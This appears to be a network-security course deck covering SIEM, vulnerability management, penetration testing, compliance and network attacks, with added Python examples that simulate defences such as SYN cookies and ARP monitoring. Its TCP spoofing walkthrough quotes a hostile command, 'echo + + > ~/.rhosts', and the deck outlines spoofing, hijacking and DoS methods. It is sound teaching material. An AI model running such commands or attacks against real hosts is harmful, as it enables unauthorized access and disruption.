[Diagram: inputs to the Correlation Engine – Policy Rules, Regulatory, Asset Groups, Host Info Details, Vulnerability Details (from the Vulnerability Scanner), Asset Criticality weighing, Active List - Asset Groups and Active List - Business Units (from Asset Management); the engine performs Statistical Threat Analysis and Rule Based Vulnerability correlation]
SIM Architecture – Output
SIM VS SEM
According to Gartner:
• "Security information and event management (SIEM) technology delivers two basic capabilities:
• Security information management (SIM) — SIM provides reporting and analysis of data primarily from host systems and applications, and secondarily from security devices to support regulatory compliance initiatives, internal threat management and security policy compliance management. SIM can be used to support the activities of the IT security, internal audit and compliance organizations.
• Security event management (SEM) — SEM improves security incident response capabilities. SEM processes near-real-time data from security devices, network devices and systems to provide real-time event management for security operations.
• SEM helps IT security operations personnel be more effective in responding to external and internal threats.
• SIM and SEM require a common set of base functions, but they differ both in scope and the time frame for data analysis"
SIM VS SEM
3. VA, PT, VM & Compliances
Network Vulnerabilities: Security Perspective
Eight Security Dimensions applied to each Security Perspective (layer and plane)
• Access Control: limit & control access to network elements, services & applications. Examples: password, ACL, firewall
• Authentication: provide proof of identity. Examples: shared secret, PKI, digital signature, digital certificate
• Non-repudiation: prevent the ability to deny that an activity on the network occurred. Examples: system logs, digital signatures
• Data Confidentiality: ensure confidentiality of data. Example: encryption
• Communication Security: ensure information only flows from source to destination. Examples: VPN, MPLS, L2TP
• Data Integrity: ensure data is received as sent or retrieved as stored. Examples: MD5, digital signature, anti-virus software
• Availability: ensure network elements, services and applications are available to legitimate users. Examples: IDS/IPS, network redundancy, BC/DR
• Privacy: ensure identification and network use is kept private. Examples: NAT, encryption
Vulnerability Management
To overcome the growing risk posed by vulnerabilities, an organization must develop a formal vulnerability management program addressing the entire life cycle of vulnerability management as shown in FIG A. All of these must be supported by an underlying foundation of people, process and technology initiatives.
[FIG A – Vulnerability Management Lifecycle: Asset Management (asset update, asset profile) → Prioritization of assets (prioritized asset list) → Vulnerability Assessment (vulnerabilities list) → Remediation → Monitoring → Reporting; each stage passes report information into a detailed report on vulnerability management]
Asset Management
• To get a confident start to a VM process it is very important to have an accurate inventory and profile of what the infrastructure contains. For an organization of any significant size, this inventory will be complex and constantly changing as new components are added and existing components are retired. The following steps aid in building a comprehensive asset inventory:
• Identification of assets can be done either manually or by using an automated tool such as asset management software
• Discovered assets must be reviewed to determine business criticality and risk tolerance
• The individuals accountable for the assets must be identified
Vulnerability Assessment
• Once the identification of the network assets is done, a vulnerability assessment should be carried out to find the vulnerabilities existing in the network. Many software tools exist that can aid in the discovery (and sometimes removal) of vulnerabilities in a computer system.
• Examples: QualysGuard, GFI LANguard Network Security Scanner, Nessus
• Though these tools can provide a good overview of possible vulnerabilities present, they cannot replace human judgment. Relying solely on scanners will yield false positives and a limited-scope view of the problems present in the system. Therefore, a proper vulnerability assessment process should use vulnerability scanner tools to identify potential vulnerabilities and then carry out a detailed vulnerability analysis to remove false positives.
Penetration Test
– Attack and penetration testing is a systematic approach to identifying weaknesses in deployed targets.
– A target may be a network, a collection of hosts, or an application that is part of an organization, function or enterprise segment to be analyzed.
• If an unauthorized individual exploits a vulnerability to access company resources, those resources can be compromised.
• A penetration test is used to show where security fails.
• Penetration testing can be performed by anyone who is knowledgeable in this area and keeps up to date with the latest security news, penetration testing tools and attack techniques.
Types Of Penetration Testing
Black Box Penetration Testing
The pen tester has no information about the target network. Only the company name or the IP address is known; nothing else (network topology etc.) about the remote network environment is provided.
White Box Penetration Testing
The pen tester is provided with significant knowledge of the target network: information about network devices (i.e. routers, switches), web server details, operating system type, database platform, load balancers, firewalls.
Types of Environment
• Wireless Networks
• DMZ environments
• Internet Data Centers (IDC)
• Portal Environment
• Extranet
• VPN Termination points
• Remote Access points
• Dial-In
• Web Application
• Database
• Routers, switches, servers, FWs, IDSes
• The organization as a whole
• Individuals and their workstations
• Other networking capable devices
Penetration Testing Methodology
[Diagram, a cycle of phases: Scope/Goal Definition → Information Gathering → Vulnerability Detection → Analysis & Planning → Attack & Penetration → Privilege Escalation → Reporting → Clean Up]
Network Penetration Testing
• Information Gathering & Network Surveying
• Foot printing or Fingerprinting
• Ports Scanning & Services Identification
• Automated Vulnerability Scanning
• Exploiting Services for Known Vulnerabilities
• Gaining Access
• Escalation of Privileges
• Exploiting Web-Based Authorization
• Password Cracking / Brute Forcing
• Denial of Services (DoS) Testing
• Report Preparation
Compliances and Standards
• Ever Expanding Regulatory Universe
– Sarbanes-Oxley (SOX)
– Payment Card Industry (PCI)
– HIPAA
– GLBA
– FFIEC
– FTC Red Flags
– Etc.
• Frameworks
– COBIT
– ISO
– ITIL
– BITS
– Etc.
Sarbanes-Oxley Act of 2002
• Congress passed the Sarbanes-Oxley Act (SOX) in large part to protect investors by improving the accuracy and reliability of corporate disclosures made pursuant to the securities laws.
• Section 404 of Sarbanes-Oxley not only requires companies to establish and maintain an adequate internal control structure, but also to assess its effectiveness on an annual basis.
SOX
Administrative Access to Financial Systems
• SOX Section 306 (a)(4) & (D)
• Lists all logon and privileged access attempts by the Administrator or SU accounts.
Computer Account Logon Activity
• ISO 17799 Section A.9.5.2
• Sarbanes Oxley sec 306 (a)(4) & (D)
• Lists all local and remote logon activity for all monitored Windows, HP-UX, AIX Unix, Sun Solaris and Red Hat Linux systems.
Computer Account Logon Activity - Windows Detail
• ISO 17799 Section A.9.5.2
• Sarbanes Oxley sec 306 (a)(4) & (D)
• Lists all logon activity for all monitored Windows domains and systems. This report is specific to monitored Windows systems, but provides a greater level of detail than the Computer Account Logon Activity report.
SOX
PCI-DSS
Resource: Sensage
Data Sources in PCI
4. Security Attacks
Security Attacks
• Attacks on Different Layers
– IP Attacks
– ICMP Attacks
– Routing Attacks
– TCP Attacks
– Application Layer Attacks
Why the Flaws?
• TCP/IP was designed for connectivity
– Had its origins in an innocent world
– Assumed to have lots of trust
– Security not intrinsic to design
• Host implementation vulnerabilities
– Software bugs
– Some elements in the specification were left to the implementers
Security Flaws in IP
• The IP addresses are filled in by the originating host
– Address spoofing
• Using source address for authentication
– r-utilities (rlogin, rsh, rhosts etc.)
[Diagram: hosts A (1.1.1.1) and B (1.1.1.2) and server S (1.1.1.3) on one network; host C (2.1.1.1) reached across the Internet]
Can A claim it is B to the server S? ARP spoofing.
Can C claim it is B to the server S? Much harder. Source routing?
Security Flaws in IP
• IP fragmentation attack
– End hosts need to keep the fragments till all the fragments arrive
• Traffic amplification attack
– IP allows broadcast destination
– Problems?
Ping Flood
[Diagram: Attacking System → Internet → two Broadcast Enabled Networks → Victim System]
ICMP Attacks
• No authentication
• ICMP redirect message
– Can cause the host to switch gateways
• Man in the middle attack, sniffing
• ICMP destination unreachable
– Can cause the host to drop connection
• Many more…
– http://www.sans.org/rr/whitepapers/threats/477.php
Routing Attacks
• Distance Vector Routing
– Announce 0 distance to all other nodes
• Blackhole traffic
• Eavesdrop
• Link State Routing
– Can drop links randomly
– Can claim direct link to any other router
– A bit harder to attack than DV
• BGP
– ASes can announce arbitrary prefix
– ASes can alter path
– Could even happen due to misconfigurations
TCP Attacks
[Diagram, three-way handshake: Client → Server: SYN x; Server → Client: SYN y | ACK x+1; Client → Server: ACK y+1]
Issues?
– Server needs to keep waiting for ACK y+1
– Server recognizes the client based on IP address/port and y+1
TCP Layer Attacks
• TCP SYN Flooding
– Exploit state allocated at server after initial SYN packet
– Send a SYN and don't reply with ACK
– Server will wait for 511 seconds for ACK
– Finite queue size for incomplete connections (1024)
– Once the queue is full it doesn't accept requests
TCP Layer Attacks
• TCP Session Hijack
– When is a TCP packet valid?
• Address/Port/Sequence Number in window
– How to get the sequence number?
• Sniff traffic
• Guess it
– Many earlier systems had predictable ISN
– Inject arbitrary data into the connection
TCP Layer Attacks
• TCP Session Poisoning
– Send RST packet
• Will tear down connection
– Do you have to guess the exact sequence number?
• Anywhere in window is fine
• For 64k window it takes 64k packets to reset
• About 15 seconds for a T1
Application Layer Attacks
• Applications don't authenticate properly
• Authentication information in clear
– FTP, Telnet, POP
• DNS insecurity
– DNS poisoning
– DNS zone transfer
An Example
Actors: Stephen (S), Trusted (T), Mahendar (M)
• Finger @S: attack when no one is around
• showmount -e: what other systems does S trust?
• Send 20 SYN packets to S: determine ISN behavior
• SYN flood T: T won't respond to packets
• Send SYN to S spoofing as T, then send ACK to S with a guessed number: S assumes that it has a session with T
• Send "echo + + > ~/.rhosts": gives permission to anyone from anywhere
[Diagram: M → S (as T): SYN; S → T: SYN|ACK, with T flooded and marked X; M → S: ACK; then "+ +" written to S's .rhosts]
Denial of Service
• Objective: make a service unusable, usually by overloading the server or network
• Consume host resources
– TCP SYN floods
– ICMP ECHO (ping) floods
• Consume bandwidth
– UDP floods
– ICMP floods
Denial of Service
• Crashing the victim
– Ping-of-Death
– TCP options (unused, or used incorrectly)
• Forcing more computation
– Taking the slow path in processing of packets
Coordinated DoS
[Diagram: several attackers and several victims]
• The first attacker attacks a different victim to cover up the real attack
• The attacker usually spoofs the source address to hide the origin
• Harder to deal with
Distributed DoS
[Diagram: Attacker → Handlers → Agents → Victim]
DDoS Defenses
• Network Capabilities
– Destination explicitly decides whether or not to allow packets
– Indicate decision by inserting "capabilities" in packets
– Routers en route check for valid capabilities in subsequent packets
– Issues?
• Traffic Scrubbers
– Sink all traffic to a back-end
– Scrub, scrub, scrub
– Issues?
Attacks
• Denial of Service (DoS)
– SYN flood
– Smurf
– Distributed DoS
• Spoofing
– IP spoofing
– ARP poisoning
– Web spoofing
– DNS spoofing
Attacks
• Man-in-the-middle
• Replays
• TCP Session hijacking
• Social Engineering
– Dumpster diving
– Online attacks
• Web defacement
Attacks
• Attacks on encrypted data
– Weak keys
– Birthday attack
– Dictionary attack
• Countermeasures
SYN flooding attack
– This exploits how the 3-way handshake of TCP services for opening a session works.
– SYN packets are sent to the target node with spoofed source IP addresses
– The node under attack sends an ACK packet and waits for a response
– Since the request has not been processed, it takes up memory
– Many such SYN packets clog the system and take up memory
– Eventually the attacked node is unable to process any requests as it runs out of memory storage space
TCP 3-way Handshake
[Diagram: two PCs exchanging three TCP packets, with each side's TCP state]
Initiating PC state: Closed → SYN-sent → ACK-received → Established
Listening PC state: Listen → SYN-received → ACK-sent → Established
1. SEQ = 1000, CTL = SYN
2. SEQ = 750, ACK = 1001, CTL = SYN | ACK
3. SEQ = 1000, ACK = 751, CTL = ACK
Land attack
• Similar to SYN attack
• Uses the target address as the source address as well
• Causes an infinite loop under the SYN/ACK process
Smurf attack
• A brute force DoS attack and thus a non-OS-specific attack
• A large number of PING requests with spoofed IP addresses are generated from within the target network
• Each ping request is broadcast, resulting in a large number of responses from all nodes on the network
• Clogs the network and prevents legitimate requests from being processed
Port scanning
• Scanning the source and destination ports for both TCP and UDP for data capture
• TCP ports are commonly monitored but UDP ports are not
Ping of death
• The hacker sends an illegal echo packet with more bytes than allowed, causing the data to be fragmented. Storing the reassembled data then causes buffer overflows, kernel dumps and crashes
• This was made possible by some Windows OSs allowing non-standard ICMP (Internet Control Message Protocol) messages to be generated
• The maximum ICMP packet size is 65507 bytes. Any echo packet exceeding this size is fragmented by the sender; the receiver tries to reconstitute the packet, and that is when the overflow occurs
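An added example (not the deck's code) of the bounds check a receiver needs when reassembling fragments: the 65507-byte ICMP data limit from the slide is derived from the 16-bit IP total length, and any fragment whose offset plus length would land past 65535 bytes is rejected instead of written. The fragment sizes and addresses are constructed.

```python
MAX_DATAGRAM = 65535                 # IP total length is a 16-bit field
IP_HEADER = 20
ICMP_HEADER = 8
MAX_ICMP_DATA = MAX_DATAGRAM - IP_HEADER - ICMP_HEADER   # 65507, the slide's figure


class OversizedDatagram(ValueError):
    """Raised instead of writing past the reassembly buffer."""


class Reassembler:
    """Minimal IP fragment reassembly with the check that Ping-of-Death era stacks
    lacked: a fragment's end (offset*8 + length) must stay within 65535 bytes."""

    def __init__(self):
        # (src, ident) -> {"chunks": {start_offset: bytes}, "total": int or None}
        self.partial = {}

    def add(self, src, ident, frag_offset_units, more_fragments, payload):
        start = frag_offset_units * 8     # the offset field counts 8-byte units
        end = start + len(payload)
        if end > MAX_DATAGRAM:
            # Discard the whole datagram: an out-of-range fragment is never legitimate.
            self.partial.pop((src, ident), None)
            raise OversizedDatagram(f"fragment covers {start}-{end}, beyond {MAX_DATAGRAM}")
        entry = self.partial.setdefault((src, ident), {"chunks": {}, "total": None})
        entry["chunks"][start] = payload
        if not more_fragments:
            entry["total"] = end          # the last fragment fixes the datagram length
        return self._try_complete(src, ident, entry)

    def _try_complete(self, src, ident, entry):
        """Return the datagram once every byte from 0 to total is covered, else None.
        Gaps and overlaps both leave it incomplete."""
        total = entry["total"]
        if total is None:
            return None
        out = bytearray()
        for start in sorted(entry["chunks"]):
            if start != len(out):
                return None
            out += entry["chunks"][start]
        if len(out) != total:
            return None
        del self.partial[(src, ident)]
        return bytes(out)


def fragments_for(payload_len, mtu_payload=1480):
    """Constructed sender: split an IP payload of payload_len zero bytes into
    (offset_units, more_fragments, data) fragments of mtu_payload bytes."""
    data = bytes(payload_len)
    frags = []
    for start in range(0, payload_len, mtu_payload):
        chunk = data[start:start + mtu_payload]
        frags.append((start // 8, start + len(chunk) < payload_len, chunk))
    return frags


def reassemble_all(frags, src="192.0.2.1", ident=1):
    """Feed a fragment list through one Reassembler; returns the datagram or None."""
    r = Reassembler()
    result = None
    for offset_units, more, data in frags:
        result = r.add(src, ident, offset_units, more, data)
    return result


if __name__ == "__main__":
    largest_echo = MAX_ICMP_DATA + ICMP_HEADER      # biggest legal ICMP echo as IP payload
    print(len(reassemble_all(fragments_for(largest_echo))), "bytes reassembled")
    try:
        reassemble_all([(8189, False, bytes(100))])  # offset 65512 + 100 > 65535
    except OversizedDatagram as e:
        print("rejected:", e)
```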
UDP-flood attack
• Denial of service variant
• Connects the target machine’s chargen and echo services to create an infinite loop between two or more UDP services
• Connectivity to the network is sufficient, no network account required for this attack
Distributed Denial of Service
• Hackers post malicious software on the web
• Script kiddies (people who do not fully understand the code) launch the attacks
• In DDoS, the hacker (also known as a black hat) identifies computers with weak security as handlers. The software in the handlers scans for hosts to be used as agents or zombies. Hundreds of thousands of zombies simultaneously launch the DoS attack in a distributed manner.
IP Spoofing
• Exploits trust relationships between routers
• This is a difficult attack to launch since the communication set-up is based on an initial sequence number for packets. Systems no longer use numbers sequentially. Identifying the algorithm used for numbering packets during set-up is important.
ARP Poisoning
• ARP = Address Resolution Protocol
• ARP is used by routers extensively to find the destination node. Routers have IP addresses (32 bits). In order to deliver the packet to the destination node, the router broadcasts the IP address of the destination and obtains the MAC address (48 bits).
• ARP Poisoning tools are:
– ARPoison
– Ettercap
– Parasite
ARP Poisoning
• Hosts store the IP-to-MAC address mapping in the ARP table. ARP poisoning means that the ARP communication is intercepted by redirection from a router.
• Example:
– Assume the router's IP is 10.1.1.0
– The host's IP is 10.1.1.1
– A malicious host with IP 10.1.1.2 spoofs 10.1.1.1 and replies to requests from 10.1.1.0 with its MAC address
– From this point on all packets meant for 10.1.1.1 are routed to 10.1.1.2 because the router has the MAC address of 10.1.1.2 in its routing table
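An added example (not from the deck) of detecting the poisoning in the example above: a passive monitor, in the style of arpwatch, keeps its own view of sender IP-to-MAC bindings and reports a binding that changes, one MAC answering for several IPs, or a conflict with a static known-good entry. The addresses follow the slide's 10.1.1.x example; the MAC addresses and timings are constructed.

```python
from collections import defaultdict

# Constructed ARP replies as a passive monitor on the slide's 10.1.1.x segment would see
# them: (seconds, sender_ip, sender_mac). 02:00:00:00:00:02 is the malicious host at
# 10.1.1.2, which from t=7 answers for 10.1.1.1 with its own MAC.
ARP_REPLIES = [
    (0.0, "10.1.1.0", "02:00:00:00:00:00"),
    (0.5, "10.1.1.1", "02:00:00:00:00:01"),
    (1.0, "10.1.1.2", "02:00:00:00:00:02"),
    (7.0, "10.1.1.1", "02:00:00:00:00:02"),   # poisoned reply
    (9.0, "10.1.1.1", "02:00:00:00:00:02"),   # repeated to keep the victim's cache poisoned
]


class ArpWatch:
    """Tracks IP-to-MAC bindings from observed ARP replies and records findings for:
    - a binding that conflicts with a static (known-good) entry,
    - a binding that differs from the MAC seen before (legitimate only on DHCP moves
      or a NIC replacement, so worth an alert either way),
    - one MAC answering for more than one IP."""

    def __init__(self, static=None):
        self.static = {ip: mac.lower() for ip, mac in (static or {}).items()}
        self.seen = {}                          # ip -> last MAC observed
        self.ips_by_mac = defaultdict(set)      # mac -> IPs it has claimed
        self.findings = []

    def observe(self, t, ip, mac):
        mac = mac.lower()
        if ip in self.static and self.static[ip] != mac:
            self.findings.append((t, "static_binding_violated", ip, self.static[ip], mac))
        prev = self.seen.get(ip)
        if prev is not None and prev != mac:
            self.findings.append((t, "binding_changed", ip, prev, mac))
        self.seen[ip] = mac
        if ip not in self.ips_by_mac[mac]:
            self.ips_by_mac[mac].add(ip)
            if len(self.ips_by_mac[mac]) > 1:
                self.findings.append((t, "mac_claims_multiple_ips", mac,
                                      sorted(self.ips_by_mac[mac])))


def analyze(replies=ARP_REPLIES, static=None):
    """Run the monitor over a reply list; returns the findings in observation order."""
    watch = ArpWatch(static)
    for t, ip, mac in replies:
        watch.observe(t, ip, mac)
    return watch.findings


if __name__ == "__main__":
    for finding in analyze(static={"10.1.1.1": "02:00:00:00:00:01"}):
        print(finding)
```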
Web Spoofing
• In this attack the malicious site pretends to be authentic
• It is a form of man-in-the-middle attack
• This is accomplished by accessing the victim website and putting a link to the malicious site under a legitimate name. For example, www.nybank.com could be linked to www.hacksite.com but the user would not be aware of this unless they pay attention to the actual site linked.
DNS Spoofing
• This is similar to web spoofing
• The DNS server could be a simple machine placed behind a firewall
• Usually it is isolated from the rest of the nodes in functionality
• The hacker gets access to the DNS server and changes the mapping in the lookup table. For example, www.nybank.com is supposed to point to 199.230.116.100; the hacker could redirect it to his web server instead.
Replays
• Replay involves capturing traffic while in transit and using it to gain access to systems.
• Example:
– The hacker sniffs the login information of a valid user
– Even if the information is encrypted, the hacker replays the login information to fool the system and gains access
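An added example (not from the deck) contrasting the replayable login just described with a nonce challenge-response that defeats it: a fixed token derived from the password is the same bytes every time, so a captured copy works again, whereas a server-issued single-use nonce with an HMAC proof over it cannot be reused. Users, secrets and timestamps are constructed.

```python
import hashlib
import hmac
import os


def password_token(password):
    """Replayable scheme from the slide: the client always sends the same value
    derived from the password. Hashing or 'encrypting' it does not change that."""
    return hashlib.sha256(password).hexdigest()


class TokenServer:
    def __init__(self, users):                  # user -> expected token
        self.users = users

    def login(self, user, token):
        return hmac.compare_digest(self.users.get(user, ""), token)


def respond(secret, nonce):
    """Client side of the challenge-response: prove the shared secret over the nonce."""
    return hmac.new(secret, nonce.encode(), hashlib.sha256).hexdigest()


class ChallengeServer:
    """Nonce challenge-response: each login binds the proof to a fresh, single-use
    server nonce, so a sniffed (user, nonce, response) triple cannot be reused."""
    NONCE_TTL = 30.0                            # seconds a challenge stays valid

    def __init__(self, secrets):                # user -> shared secret bytes
        self.secrets = secrets
        self.pending = {}                       # nonce -> (user, expiry)

    def challenge(self, user, now):
        nonce = os.urandom(16).hex()
        self.pending[nonce] = (user, now + self.NONCE_TTL)
        return nonce

    def login(self, user, nonce, response, now):
        entry = self.pending.pop(nonce, None)   # pop: the nonce is consumed on first use
        secret = self.secrets.get(user)
        if entry is None or secret is None or entry[0] != user or now > entry[1]:
            return False
        return hmac.compare_digest(respond(secret, nonce), response)


def demo():
    """Returns (token_first, token_replay, cr_first, cr_replay, cr_stale)."""
    pw = b"constructed-password"
    tok_srv = TokenServer({"alice": password_token(pw)})
    captured_token = password_token(pw)           # what the sniffer in the diagram sees
    token_first = tok_srv.login("alice", captured_token)
    token_replay = tok_srv.login("alice", captured_token)   # same bytes work again

    secret = os.urandom(32)
    cr_srv = ChallengeServer({"alice": secret})
    nonce = cr_srv.challenge("alice", now=100.0)
    captured = ("alice", nonce, respond(secret, nonce))    # everything on the wire
    cr_first = cr_srv.login(*captured, now=101.0)
    cr_replay = cr_srv.login(*captured, now=102.0)          # nonce already consumed
    nonce2 = cr_srv.challenge("alice", now=200.0)
    cr_stale = cr_srv.login("alice", nonce2, respond(secret, nonce2), now=300.0)  # expired
    return token_first, token_replay, cr_first, cr_replay, cr_stale


if __name__ == "__main__":
    print(demo())
```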
Replays
• A sniffer is a program that intercepts and reads traffic on the network
• Sniffers work when the NIC is set to communicate in promiscuous mode
Replay Attack Diagram
[Diagram: the valid user's id and password are sniffed on the way to the server; the hacker then replays the sniffed id and password to the server]
TCP Session Hijacking
• This means that the hacker has directed traffic to his own server instead of the trusted server that the victim assumes it is talking to
• To hijack a session, the hacker ARP poisons the router to route all traffic to his computer before it is delivered to the victim
• See Figure 3-14 (p. 68) in the book for details of IP and MAC addresses needed to understand this type of attack
Dictionary attack
• Has an idea of the message
• Has the hashed value from the message
• Exhaustive search to find the original corresponding to the hash
• Credit cards use 16 digits
– 2^55 ≈ 10^16
– This is within the realm of possibility for today's computers to do an exhaustive search
• Does not involve any encryption
Birthday attack
• A variation of brute-force attack
• Studies have shown that if 23 people are in a room, the probability is over 50% that two people have the same birthday
• The similarity here is: knowing one value, can you find a matching value?
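As an added example (not from the deck), the birthday computation carried through and then applied to hash outputs, which goes beyond the slide's 23-people case: a collision search over an n-bit hash costs about 2^(n/2) trials while a search for a given value costs about 2^n, which is why hash output length matters for the integrity mechanisms listed earlier. The truncated-SHA-256 stand-in and the message formats are constructed.

```python
import hashlib
import math


def birthday_probability(n, space=365):
    """Exact probability that n values drawn uniformly from `space` contain a repeat:
    1 - prod_{i=0}^{n-1} (space - i) / space."""
    p_distinct = 1.0
    for i in range(n):
        p_distinct *= (space - i) / space
    return 1.0 - p_distinct


def birthday_approx(n, space):
    """Standard approximation 1 - exp(-n(n-1) / 2N); accurate when n is much less than N."""
    return 1.0 - math.exp(-n * (n - 1) / (2.0 * space))


def draws_for_half(space):
    """Draws needed for a 50% collision chance: sqrt(2 ln 2 * N), about sqrt(N).
    For N = 365 this is about 22.5, the '23 people' figure."""
    return math.sqrt(2.0 * math.log(2.0) * space)


def truncated_hash(msg, bits):
    """Top `bits` bits of SHA-256, standing in for a hash with a small output."""
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") >> (256 - bits)


def find_collision(bits):
    """Birthday search: hash distinct messages until any two share a value.
    Expected work is about 2^(bits/2). Returns (trials, msg_a, msg_b)."""
    seen = {}
    i = 0
    while True:
        msg = b"msg-%d" % i
        h = truncated_hash(msg, bits)
        if h in seen:
            return i + 1, seen[h], msg
        seen[h] = msg
        i += 1


def find_preimage(target, bits):
    """Search for a message hashing to one given value: expected work is about
    2^bits, the square of the collision cost. Returns (trials, msg)."""
    i = 0
    while True:
        msg = b"pre-%d" % i
        if truncated_hash(msg, bits) == target:
            return i + 1, msg
        i += 1


if __name__ == "__main__":
    print("23 people:", round(birthday_probability(23), 4), "exact;",
          round(birthday_approx(23, 365), 4), "approx")
    trials, a, b = find_collision(32)
    print(f"32-bit collision after {trials} trials: {a!r} and {b!r}")
```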
Countermeasures
• For SYN-flood attack:
– A firewall can withhold or insert packets into the data stream, thus providing one means of keeping the SYN packets from getting through
– The firewall responds immediately to the SYN with its ACK sent to the spoofed address. This way the inquiry is not in the open queue taking up space. Legitimate addresses would respond immediately and could be forwarded by the firewall to the internal systems. SYN-flood attack packets would not receive a reply from the spoofed address, and so they are sent a RST (reset) signal after the configured timeout.
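An added simulation (not from the deck, and sending no packets) of the SYN flood described in this section and of the countermeasure above: a listener that allocates a half-open entry per SYN, using the 1024-entry queue and 511-second timeout from the slides, next to a stateless variant of the "answer the SYN yourself and keep nothing until the ACK arrives" idea, implemented here as SYN cookies, where the server's sequence number is an HMAC over the peer address and a time slot. The cookie layout, flood sizes and addresses are assumptions.

```python
import hashlib
import hmac
import random
from collections import OrderedDict

BACKLOG = 1024        # finite queue for incomplete connections (slide value)
SYN_TIMEOUT = 511.0   # secon­ds a half-open entry is kept (slide value)


class StatefulListener:
    """Classic server side: a half-open entry is allocated per SYN and lives until the
    peer's ACK arrives or the timeout expires. Forged SYNs therefore cost the server
    memory that the sender never pays for."""

    def __init__(self, backlog=BACKLOG, timeout=SYN_TIMEOUT):
        self.backlog, self.timeout = backlog, timeout
        self.half_open = OrderedDict()     # (ip, port) -> (server_isn, arrival_time)
        self.established = set()
        self.dropped = 0

    def _expire(self, now):
        while self.half_open:
            key, (_, t) = next(iter(self.half_open.items()))   # oldest entry first
            if now - t < self.timeout:
                break
            del self.half_open[key]

    def on_syn(self, src, now):
        self._expire(now)
        if len(self.half_open) >= self.backlog:
            self.dropped += 1                # queue full: the SYN is silently discarded
            return None
        isn = random.getrandbits(32)         # server sequence number sent in the SYN|ACK
        self.half_open[src] = (isn, now)
        return isn

    def on_ack(self, src, ack, now):
        entry = self.half_open.get(src)
        if entry is None or ack != ((entry[0] + 1) & 0xFFFFFFFF):
            return False
        del self.half_open[src]
        self.established.add(src)
        return True


class SynCookieListener:
    """SYN-cookie style: nothing is stored on SYN. The ISN is an HMAC over the peer's
    address and a coarse time slot, so only a peer that actually received the SYN|ACK
    can return ISN+1, and only while the slot is fresh."""
    SLOT_SECONDS = 64

    def __init__(self, secret):
        self.secret = secret
        self.established = set()

    def _cookie(self, src, slot):
        msg = f"{src[0]}:{src[1]}:{slot}".encode()
        mac = int.from_bytes(hmac.new(self.secret, msg, hashlib.sha256).digest()[:4], "big")
        return ((slot & 0x1F) << 27) | (mac & 0x07FFFFFF)   # 5 slot bits + 27 MAC bits

    def on_syn(self, src, now):
        return self._cookie(src, int(now // self.SLOT_SECONDS))   # reply, keep no state

    def on_ack(self, src, ack, now):
        isn = (ack - 1) & 0xFFFFFFFF
        cur = int(now // self.SLOT_SECONDS)
        for slot in (cur, cur - 1):          # tolerate one slot boundary
            if (slot & 0x1F) == isn >> 27 and self._cookie(src, slot) == isn:
                self.established.add(src)
                return True
        return False


def simulate(listener, flood_syns, now=0.0):
    """flood_syns SYNs from forged sources that never finish the handshake, then one
    legitimate client. Returns True if the legitimate client reaches ESTABLISHED."""
    for i in range(flood_syns):
        listener.on_syn(("198.51.100.%d" % (i % 250), 40000 + i), now)
    legit = ("192.0.2.10", 51000)
    isn = listener.on_syn(legit, now + 1)
    if isn is None:
        return False
    return listener.on_ack(legit, (isn + 1) & 0xFFFFFFFF, now + 2)


if __name__ == "__main__":
    s = StatefulListener()
    print("stateful listener, legit client connects:", simulate(s, 2000), "dropped:", s.dropped)
    print("SYN-cookie listener, legit client connects:", simulate(SynCookieListener(b"k"), 2000))
```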
Countermeasures
• For Smurf attack:
– Routers should be configured to drop ICMP messages from outside the network with a destination of an internal broadcast or multicast
– Newer OSs for routers and workstations have protection for known smurf attacks
Countermeasures
• For IP Spoofing attack:
– This is a difficult attack to start with for the hacker
– The hacker must be able to guess correctly the Initial Sequence Number that the spoofed IP would generate
– To prevent IP spoofing, disable source routing on all internal routers
– Filter entering packets with a source address of the local network
Countermeasures
• For Man in the middle attack:
– Routers should be configured to ignore ICMP redirect packets
• An Intrusion Detection System (IDS) is software that scans traffic in real time and detects anomalies
• Cisco, Computer Associates and SecureWorks are some of the companies that provide IDS software
• Availability of an IDS is a requirement in the medical and financial industry for the business to get its license
• The industry is now moving towards Intrusion Prevention Systems (IPS) as opposed to IDS
Countermeasures
• For Ping of death attack:
– Prohibit creation of ICMP packets of invalid size
• For Denial of Service attack:
– Firewalls and routers at network boundaries can use filters to prevent spoofed packets from leaving the network
– Filter incoming packets with a broadcast address
– Turn off directed broadcasts on all internal routers
– Block known private IP addresses being used as destination IP (e.g., 10.0.0.0, 172.16.24.0, 192.168.0.0, 224.0.0.0, 127.0.0.1)
5. Software Exploitation
Software Exploitation
• Malicious software, also known as malware, includes worms, viruses, and Trojan horses
• How do these propagate?
– A virus is meant to replicate itself into executables (e.g., Melissa)
– A worm is meant to propagate itself across the network (e.g., Nimda, Code Red)
– A Trojan horse is meant to entice the unsuspecting user to execute a worm (e.g., I Love You)
Software exploitation
– Malicious software (virus and worm)
– Back door
– Logic bombs
Malicious code
Type: Characteristics
• Virus: attaches itself to programs and propagates copies of itself to other programs
• Trojan horse: contains unexpected functionality
• Logic bomb: triggers action when a condition occurs
• Time bomb: triggers action at a certain time
• Trapdoor: allows unauthorized access to functionality
• Worm: propagates copies of itself through a network
• Rabbit: replicates without limit to exhaust resources
Viruses
• Viruses: a string of computer code that attaches to other programs and replicates
– File infectors: the oldest type of virus, now mostly extinct
– Boot-sector viruses: reside on the boot portion of a disk. Also mostly extinct
– Macro viruses: written in a scripting language and affect data files, not programs. The future of viruses.
• No absolute cure for viruses
– Antivirus programs work, but need continual updating.
– Virus makers depend on the laziness of users to let virus definitions get out of date.
Virus
• A virus self-replicates
• Early viruses (1980s to mid-90s) were placed on the boot sector of hard and floppy drives as they would not show up in the directory listing
• The second type of virus is known as the 'parasitic virus'. This was prevalent in the mid-90s.
• A parasitic virus attaches to files and infects files of type exe, sys, com, dll, bin, drv
• The third virus type is the 'multipartite virus'. This infected both boot sector and files. This was also common in the mid-90s.
• The current virus type is known as the 'macro virus'. These are application specific as opposed to operating system specific. They propagate rapidly through email. Most macro viruses are written in VB Script and they exploit Microsoft's applications such as Outlook.
Viruses and Worms
• A virus is a program that reproduces itself by attaching its code to another program
– They require human intervention to spread
– Melissa and I LOVE YOU spread by e-mail
• Worms actively replicate without a helper program
– A subclass of virus, but does not require user intervention
– Sasser and Blaster targeted machines with out-of-date software
Antivirus
Antivirus software is a term used to describe a computer program that attempts to identify, neutralize or eliminate malicious software. This type of software is so named because the earliest examples were designed exclusively to combat computer viruses; however most modern antivirus software is now designed to combat a wide range of threats, including worms, phishing attacks, rootkits, trojan horses.
Antivirus software typically uses two different techniques to accomplish this:
-Examining (scanning) files to look for known viruses matching definitions in a virus dictionary
-Identifying suspicious behavior from any computer program which might indicate infection. Such analysis may include data captures, port monitoring and other methods.
